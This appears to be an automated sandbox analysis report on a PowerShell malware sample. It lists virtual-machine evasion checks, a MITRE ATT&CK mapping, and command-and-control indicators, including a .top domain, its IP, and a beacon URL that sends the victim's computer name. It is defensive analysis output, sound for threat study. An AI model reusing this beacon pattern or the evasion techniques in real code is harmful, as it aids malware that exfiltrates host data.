Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5983Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3888Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4436Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000000.00000002.2151716083.000002931F7E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.2191030398.0000029336C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.2151716083.000002931F7E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
Source: powershell.exe, 00000000.00000002.2151716083.000002931F7E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware`SZ
Source: powershell.exe, 00000000.00000002.2151716083.000002931F268000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.2151716083.000002931F268000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine`SZ
Source: powershell.exe, 00000000.00000002.2151716083.000002931F7E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "VMware"
Source: powershell.exe, 00000000.00000002.2151716083.000002931F7E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000000.00000002.2151716083.000002931F7E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.2151716083.000002931F268000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.2151716083.000002931F268000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000000.00000002.2151716083.000002931F7E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: powershell.exe, 00000000.00000002.2191030398.0000029336C63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation		1
DLL Side-Loading		1
Process Injection		121
Virtualization/Sandbox Evasion		OS Credential Dumping21
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information		Security Account Manager121
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture12
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
download.ps15%ReversingLabsWin32.Trojan.Generic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://crl.microsoft$T50%Avira URL Cloudsafe
https://0.google.com/0%Avira URL Cloudsafe
http://bfhdkgmmhdbikgj.top0%Avira URL Cloudsafe
https://0.google0%Avira URL Cloudsafe
http://wwwft.com/p/Mic0%Avira URL Cloudsafe
http://$q0683ukmncpy7gl/$6feonrgjq9a5ulh.php?id=$env:computername&key=$buwjfgxalt&s=5270%Avira URL Cloudsafe
http://0.google.com/0%Avira URL Cloudsafe
http://0.google.0%Avira URL Cloudsafe
http://bfhdkgmmhdbikgj.top/f7qe6pa3v1htr.php?id=user-PC&key=63266493739&s=5270%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
bfhdkgmmhdbikgj.top
45.61.136.138
truetrue
    		unknown
    www.google.com
    		142.250.186.36
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://bfhdkgmmhdbikgj.top/f7qe6pa3v1htr.php?id=user-PC&key=63266493739&s=527true
      • Avira URL Cloud: safe
      		unknown
      http://www.google.com/false
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://www.google.com/intl/en/about/products?tab=whpowershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://www.google.com/url?q=https://www.google.com/maps/search/electronics%2Brecycling%2Bnear%2Bme%powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E8AB000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://www.google.com/preferences?hl=enXpowershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.2180658553.000002932E819000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E8AB000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://contoso.com/Licensepowershell.exe, 00000000.00000002.2180658553.000002932E6AF000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://news.google.com/?tab=wnpowershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://schema.org/WebPagepowershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.0000029320D06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.0000029320B5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.00000293209D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.00000293209E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.00000293209CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.00000293209CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E8AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.0000029320CE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.00000293209F1000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://0.google.com/powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/webhp?tab=wwpowershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://crl.microsoft$T5powershell.exe, 00000000.00000002.2189658899.0000029336A00000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.microsopowershell.exe, 00000000.00000002.2191030398.0000029336C0F000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://wwwft.com/p/Micpowershell.exe, 00000000.00000002.2191030398.0000029336C0F000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://schema.org/WebPageXpowershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/powershell.exe, 00000000.00000002.2180658553.000002932E6AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2180658553.000002932E6AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.google.com/finance?tab=wepowershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.google.compowershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FDFE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://apis.google.compowershell.exe, 00000000.00000002.2180658553.000002932E819000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FF16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E8AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://bfhdkgmmhdbikgj.toppowershell.exe, 00000000.00000002.2151716083.000002931FB5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FDFE000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2151716083.000002931E641000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.blogger.com/?tab=wjpowershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://play.google.com/?hl=en&tab=w8powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2180658553.000002932E6AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000000.00000002.2180658553.000002932E819000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2180658553.000002932E8AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2151716083.000002931E868000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.2151716083.000002931E868000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2151716083.000002931E868000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://drive.google.com/?tab=wopowershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://contoso.com/Iconpowershell.exe, 00000000.00000002.2180658553.000002932E6AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://0.googlepowershell.exe, 00000000.00000002.2151716083.000002931FE64000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://mail.google.com/mail/?tab=wmpowershell.exe, 00000000.00000002.2151716083.000002932052D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
